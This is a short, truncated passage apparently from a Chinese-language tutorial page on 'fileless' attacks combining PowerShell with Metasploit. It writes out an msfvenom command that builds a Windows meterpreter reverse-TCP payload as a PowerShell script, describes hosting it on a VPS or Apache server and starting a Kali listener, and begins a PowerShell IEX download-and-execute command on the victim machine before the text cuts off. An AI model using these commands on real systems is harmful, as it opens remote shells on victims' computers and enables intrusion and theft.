Powershell 配合msf无文件攻击

生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上,这里我们放到本机搭建的apache环境中 kali设置监听,并且启动 win7中访问木马是否成功 直接在win7的cmd中执行命令 powershell IEX (N
相关文章
相关标签/搜索